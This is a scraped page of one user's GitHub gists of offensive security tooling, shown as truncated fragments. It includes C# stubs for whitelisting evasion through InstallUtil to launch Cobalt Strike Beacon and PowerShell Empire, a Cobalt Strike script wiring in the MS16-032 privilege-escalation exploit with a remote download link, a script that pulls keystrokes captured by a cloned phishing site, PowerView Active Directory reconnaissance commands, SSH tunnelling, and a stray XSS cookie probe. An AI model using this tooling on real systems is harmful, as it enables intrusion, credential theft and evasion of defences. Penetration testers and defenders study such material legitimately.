
vysecurity / beaconPayload.cs
Created January 28, 2016 13:41
Application Whitelisting Evasion for Cobalt Strike - Beacon Payload
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
vysecurity / empire.cs
Created April 6, 2016 02:12
PowerShell Empire via InstallUtil.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
vysecurity / ms16-032.cna
Created September 28, 2016 23:21 — forked from rsmudge/ms16-032.cna
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
#
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {
vysecurity / webkeystrokes.cna
Created September 28, 2016 23:21 — forked from rsmudge/webkeystrokes.cna
Shows how to pull keystrokes captured by the website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
# convert comma separated keystroke values into a string.
sub toString {
	# $1 is a comma-separated record: the first field is discarded, every
	# remaining field is a hex-encoded character code that is decoded and
	# appended to the result.
	local('@fields $decoded $hexcode');
	@fields = split(",", $1);
	shift(@fields);
	$decoded = "";
	foreach $hexcode (@fields) {
		# parseNumber converts base-16 text to a base-10 value for chr()
		$decoded = $decoded . chr(parseNumber($hexcode, 16, 10));
	}
	return $decoded;
}
vysecurity / getpidany.cna
Created September 28, 2016 23:22 — forked from rsmudge/getpidany.cna
Get PID of Any Process
# getexplorerpid($bid, &callback);
sub getanypid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq $proc) {
# $1 is our Beacon ID, $pid is the PID of $proc
[$callback: $1, $proc, $pid];
}
alert(document.cookie);
vysecurity / gist:702a165b23b2a290859e179bad3f4a18
Created May 27, 2017 03:02 — forked from pcting/gist:1041387
SSH Tunnel UDP Packets from REMOTE server
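# YOUR LOCAL BOX
# Relay: TCP connections arriving on 6667 (from the ssh reverse tunnel
# below) are unwrapped and sent on as UDP to the local service on 4445.
# bind=127.0.0.1 keeps this listener off external interfaces -- the only
# legitimate client is the ssh tunnel endpoint on this same host, so there
# is no reason to accept TCP from anyone else.
socat -t0 -T0 tcp4-listen:6667,bind=127.0.0.1,reuseaddr,fork UDP:localhost:4445
# Reverse tunnel: port 6667 on the remote host is forwarded back to the
# listener above. With sshd's default GatewayPorts setting the remote end
# is bound to loopback only.
ssh user@remote_server -R 6667:localhost:6667
# REMOTE MACHINE
# Each UDP datagram received on 4445 is handed to a forked child that
# opens a TCP connection to the tunnel endpoint on 6667. Note this UDP
# receiver is not bound to loopback: it is the intended public entry point,
# so restrict it at the host firewall if only known senders should reach it.
socat -t0 -T0 udp4-recvfrom:4445,reuseaddr,fork tcp:localhost:6667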
vysecurity / PowerView-2.0-tricks.ps1
Created June 17, 2017 22:19 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
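# get all the groups a user is effectively a member of, 'recursing up'
# (nested membership resolved; useful when auditing what a single account can reach)
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
# parameter is -GroupName (the common misspelling -GoupName is rejected by PowerShell)
Get-NetGroupMember -GroupName <GROUP> -Recurse
# get the effective set of users who can administer a server
# (host name is passed positionally; -Recurse expands nested domain groups)
Get-NetLocalGroup -Recurse SERVER.domain.local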
# retrieve all the computers a GPP password applies to
vysecurity / PowerView-3.0-tricks.ps1
Created June 18, 2017 08:48 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
# Add : add a new object to a destination
# Set : modify a given object
# Invoke : lazy catch-all
vysecurity / Azure
Last active August 31, 2017 05:14
admin.iris.net
admin.mywebvalet.net
admin.seo.com.cn
api.mywebvalet.net
api.nuget.org
api.squaremeal.co.uk
app.iris.net
app.mywebvalet.net
app.swyftmedia.com
cdn.24sevenoffice.com